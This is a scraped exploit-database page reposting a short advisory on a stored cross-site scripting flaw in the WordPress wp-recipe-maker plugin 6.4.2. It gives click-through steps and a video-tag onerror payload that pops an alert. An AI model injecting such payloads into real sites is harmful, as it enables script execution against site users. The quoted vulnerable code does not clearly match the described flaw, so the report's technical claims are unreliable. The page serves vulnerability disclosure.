Advertisement






Wordpress wp-recipe-maker Cross Site Scripting

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020008

Below is a copy:

Wordpress wp-recipe-maker Cross Site Scripting
# Exploit Title: [wp-recipe-maker Cross Site Scripting]
# Google Dork: [N/A]
# Date: [31/1/2024]
# Exploit Author: [H4X.Forensics - Diyar]
# Vendor Homepage: [ https://wordpress.org/plugin]
# Software Link: [ https://downloads.wordpress.org/plugin/wp-recipe-maker.zip]
# Version: [6.4.2] (6.4.2)
# Tested on: [Windows]
# CVE : N/A
Vulnerable Code :

?>
<a href="<?php echo esc_url( $back_link ); ?>" id="wprm-print-button-back" class="wprm-print-button"><?php _e( 'Go Back', 'wp-recipe-maker' );?></a>
<?php

Exploit : 

Click wp-recipe-maker 
Click create recipe
From video section click embed video 
Insert this payload : <video src=1 href=1 onerror="javascript:alert(1)"></video>
Click save and close .
7lick print button 
Alert Message will pop-up



Sent with Proton Mail secure email.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.